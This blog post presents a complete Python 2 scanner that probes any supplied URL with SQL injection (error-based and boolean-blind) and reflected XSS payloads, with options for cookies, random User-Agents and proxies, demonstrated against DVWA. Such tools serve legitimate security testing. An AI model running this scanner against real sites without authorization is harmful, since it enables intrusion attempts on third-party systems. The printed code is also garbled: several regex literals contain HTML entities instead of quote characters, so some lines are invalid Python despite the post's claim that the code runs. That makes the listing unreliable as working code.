
Implementing a Web Vulnerability Scanner with a Python Script

高洛峰 (original) | 2017-02-06 13:42:01

This is a small web vulnerability scanner I built last year for my graduation project. It targets simple SQL injection, blind SQL injection, and XSS vulnerabilities. I wrote the code myself after studying the source of two small tools on GitHub by a well-known foreign developer (said to be one of the authors of SMAP), following the ideas used there. Usage instructions and the source code follow.

I. Usage instructions

1. Runtime environment:

Linux command line + Python 2.7

2. Creating the program file:

vim scanner //create a file named scanner and paste the source code below into it
chmod +x scanner //change the file permissions to make it executable

3. Running the program:

python scanner //run the program

If no target URL is supplied, the program prints a help message listing the parameters that can be passed.

The parameters include:

-h, --help print the help message
--url URL to scan
--data parameters for a POST request
--cookie HTTP Cookie header value
--user-agent HTTP User-Agent header value
--random-agent use a randomly selected browser User-Agent
--referer HTTP Referer header value (the page that links to the target URL)
--proxy HTTP proxy address

For example, to scan "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit":

python scanner --url="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie="security=low;PHPSESSID=menntb9b2isj7qha739ihg9of1"
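
If the target submits its parameters via POST, they can be passed with --data instead of being appended to the URL. A sketch of such an invocation (the DVWA path and cookie value here are only placeholders, not taken from the scan above):

python scanner --url="http://127.0.0.1/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="security=low;PHPSESSID=<your session id>" --random-agent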

The scan output shows the following results:

An XSS vulnerability exists, matched by the pattern-library signature ">.xss.<" (payload reflected outside of tags). A SQL injection vulnerability exists, and the target server's database is MySQL.

A blind SQL injection vulnerability also exists.
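
For context on how the script reaches these verdicts (both mechanisms are visible in the source below): the error-based check appends a random permutation of the characters in TAMPER_SQL_CHAR_POOL to the parameter value and looks for DBMS error signatures such as r"SQL syntax.*MySQL", which is how the database is identified as MySQL; the blind check builds pairs of boolean payloads from PREFIXES, BOOLEAN_TESTS and SUFFIXES. Roughly (URL-encoding omitted), one such pair for the id parameter is:

id=1' AND 1=1-- -&Submit=Submit    (TRUE condition)
id=1' AND 2=1-- -&Submit=Submit    (FALSE condition)

If the response to the TRUE payload matches the original page (difflib similarity above 0.95) while the FALSE response clearly differs (below 0.95), the parameter is reported as vulnerable to blind SQL injection.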

II. Source code

The code has been verified to run; I personally recommend testing it against DVWA.

#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
import optparse, random, re, string, urllib, urllib2, difflib, itertools, httplib
NAME = "Scanner for RXSS and SQLI"
AUTHOR = "Lishuze"
PREFIXES = (" ", ") ", "' ", "') ", "\"") 
SUFFIXES = ("", "-- -", "#") 
BOOLEAN_TESTS = ("AND %d=%d", "OR NOT (%d=%d)") 
TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"')
TAMPER_XSS_CHAR_POOL = ('\'', '"', '>', '<', ';')
GET, POST = "GET", "POST"
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"
TEXT, HTTPCODE, TITLE, HTML = xrange(4) 
_headers = {} 
USER_AGENTS = ( 
"Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0", 
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", 
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21", 
) 
XSS_PATTERNS = ( 
(r"<!--[^>]*%(chars)s|%(chars)s[^<]*-->","\"<!--.&#39;.xss.&#39;.-->\", inside the comment", None), 
(r"(?s)<script[^>]*>[^<]*?&#39;[^<&#39;]*%(chars)s|%(chars)s[^<&#39;]*&#39;[^<]*</script>","\"<script>.&#39;.xss.&#39;.</script>\", enclosed by <script> tags, inside single-quotes", None), 
(r&#39;(?s)<script[^>]*>[^<]*?"[^<"]*%(chars)s|%(chars)s[^<"]*"[^<]*</script>&#39;,"&#39;<script>.\".xss.\".</script>&#39;, enclosed by <script> tags, inside double-quotes", None), 
(r"(?s)<script[^>]*>[^<]*?%(chars)s|%(chars)s[^<]*</script>","\"<script>.xss.</script>\", enclosed by <script> tags", None), 
(r">[^<]*%(chars)s[^<]*(<|\Z)", "\">.xss.<\", outside of tags", r"(?s)<script.+?</script>|<!--.*?-->"), 
(r"<[^>]*&#39;[^>&#39;]*%(chars)s[^>&#39;]*&#39;[^>]*>", "\"<.&#39;.xss.&#39;.>\", inside the tag, inside single-quotes", r"(?s)<script.+?</script>|<!--.*?-->"), 
(r&#39;<[^>]*"[^>"]*%(chars)s[^>"]*"[^>]*>&#39;, "&#39;<.\".xss.\".>&#39;, inside the tag, inside double-quotes", r"(?s)<script.+?</script>|<!--.*?-->"), 
(r"<[^>]*%(chars)s[^>]*>", "\"<.xss.>\", inside the tag, outside of quotes", r"(?s)<script.+?</script>|<!--.*?-->") 
) 
DBMS_ERRORS = { 
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."), 
"Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."), 
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"), 
"Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*") 
} 
def _retrieve_content_xss(url, data=None):
    # Fetch the page, URL-encoding any spaces that appear in the query string
    surl = ""
    for i in xrange(len(url)):
        if i > url.find('?'):
            surl += surl.join(url[i]).replace(' ', "%20")
        else:
            surl += surl.join(url[i])
    try:
        req = urllib2.Request(surl, data, _headers)
        retval = urllib2.urlopen(req, timeout=30).read()
    except Exception, ex:
        retval = getattr(ex, "message", "")
    return retval or ""
def _retrieve_content_sql(url, data=None):
    # Fetch the page and record HTTP code, <title>, visible text and raw HTML for later comparison
    retval = {HTTPCODE: httplib.OK}
    surl = ""
    for i in xrange(len(url)):
        if i > url.find('?'):
            surl += surl.join(url[i]).replace(' ', "%20")
        else:
            surl += surl.join(url[i])
    try:
        req = urllib2.Request(surl, data, _headers)
        retval[HTML] = urllib2.urlopen(req, timeout=30).read()
    except Exception, ex:
        retval[HTTPCODE] = getattr(ex, "code", None)
        retval[HTML] = getattr(ex, "message", "")
    match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I)
    retval[TITLE] = match.group("result") if match else None
    retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML])
    return retval
def scan_page_xss(url, data=None):
    print "Start scanning RXSS:\n"
    retval, usable = False, False
    url = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url
    data = re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w]+)=)(?P<value>[^&]+)", current):
                found, usable = False, True
                print "Scanning %s parameter '%s'" % (phase, match.group("parameter"))
                # Wrap the XSS test characters in a random prefix/suffix so reflections can be located
                prefix = ("".join(random.sample(string.ascii_lowercase, 5)))
                suffix = ("".join(random.sample(string.ascii_lowercase, 5)))
                if not found:
                    tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("%s%s%s%s" % ("'", prefix, "".join(random.sample(TAMPER_XSS_CHAR_POOL, len(TAMPER_XSS_CHAR_POOL))), suffix))))
                    content = _retrieve_content_xss(tampered, data) if phase is GET else _retrieve_content_xss(url, tampered)
                    for sample in re.finditer("%s([^ ]+?)%s" % (prefix, suffix), content, re.I):
                        #print sample.group()
                        for regex, info, content_removal_regex in XSS_PATTERNS:
                            context = re.search(regex % {"chars": re.escape(sample.group(0))}, re.sub(content_removal_regex or "", "", content), re.I)
                            if context and not found and sample.group(1).strip():
                                print "!!!%s parameter '%s' appears to be XSS vulnerable (%s)" % (phase, match.group("parameter"), info)
                                found = retval = True
        if not usable:
            print " (x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r (x) Ctrl-C pressed"
    return retval
def scan_page_sql(url, data=None):
    print "Start scanning SQLI:\n"
    retval, usable = False, False
    url = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url
    data = re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current):
                vulnerable, usable = False, True
                original = None
                print "Scanning %s parameter '%s'" % (phase, match.group("parameter"))
                # Error-based check: append random SQL metacharacters and look for DBMS error messages
                tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL))))))
                content = _retrieve_content_sql(tampered, data) if phase is GET else _retrieve_content_sql(url, tampered)
                for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
                    if not vulnerable and re.search(regex, content[HTML], re.I):
                        print "!!!%s parameter '%s' could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms)
                        retval = vulnerable = True
                vulnerable = False
                # Boolean-based blind check: compare the TRUE and FALSE responses against the original page
                original = original or (_retrieve_content_sql(current, data) if phase is GET else _retrieve_content_sql(url, current))
                for prefix, boolean, suffix in itertools.product(PREFIXES, BOOLEAN_TESTS, SUFFIXES):
                    if not vulnerable:
                        template = "%s%s%s" % (prefix, boolean, suffix)
                        payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (1 if _ else 2, 1), safe='%')))) for _ in (True, False))
                        contents = dict((_, _retrieve_content_sql(payloads[_], data) if phase is GET else _retrieve_content_sql(url, payloads[_])) for _ in (False, True))
                        if all(_[HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (HTTPCODE, TITLE))):
                            vulnerable = True
                        else:
                            ratios = dict((_, difflib.SequenceMatcher(None, original[TEXT], contents[_][TEXT]).quick_ratio()) for _ in (True, False))
                            vulnerable = all(ratios.values()) and ratios[True] > 0.95 and ratios[False] < 0.95
                        if vulnerable:
                            print "!!!%s parameter '%s' could be Blind SQLi vulnerable" % (phase, match.group("parameter"))
                            retval = True
        if not usable:
            print " (x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r (x) Ctrl-C pressed"
    return retval
def init_options(proxy=None, cookie=None, ua=None, referer=None):
    global _headers
    _headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
    urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})) if proxy else None)

if __name__ == "__main__":
    print "----------------------------------------------------------------------------------"
    print "%s\nBy:%s" % (NAME, AUTHOR)
    print "----------------------------------------------------------------------------------"
    parser = optparse.OptionParser()
    parser.add_option("--url", dest="url", help="Target URL")
    parser.add_option("--data", dest="data", help="POST data")
    parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
    parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
    parser.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value")
    parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
    parser.add_option("--proxy", dest="proxy", help="HTTP proxy address")
    options, _ = parser.parse_args()
    if options.url:
        init_options(options.proxy, options.cookie, options.ua if not options.randomAgent else random.choice(USER_AGENTS), options.referer)
        result_xss = scan_page_xss(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
        print "\nScan results: %s vulnerabilities found" % ("possible" if result_xss else "no")
        print "----------------------------------------------------------------------------------"
        result_sql = scan_page_sql(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
        print "\nScan results: %s vulnerabilities found" % ("possible" if result_sql else "no")
        print "----------------------------------------------------------------------------------"
    else:
        parser.print_help()
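
As a small illustration of the comparison step used in scan_page_sql above, the following snippet is not part of the scanner, only a sketch of how difflib.SequenceMatcher.quick_ratio behaves when the FALSE payload removes content from the page (the page texts are made up):

# Illustrative only: the scanner flags blind SQLi when ratio_true > 0.95 and ratio_false < 0.95
import difflib
original = "First name: admin Surname: admin"
true_page = "First name: admin Surname: admin"   # TRUE payload: page unchanged
false_page = "First name:  Surname: "            # FALSE payload: record missing
ratio_true = difflib.SequenceMatcher(None, original, true_page).quick_ratio()
ratio_false = difflib.SequenceMatcher(None, original, false_page).quick_ratio()
print ratio_true, ratio_false  # roughly 1.0 and a clearly lower value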

The above is the Python web vulnerability scanner script introduced here. I hope it is helpful; if you have any questions, please leave a message and I will reply as soon as possible. Many thanks as well for everyone's support of PHP中文網!

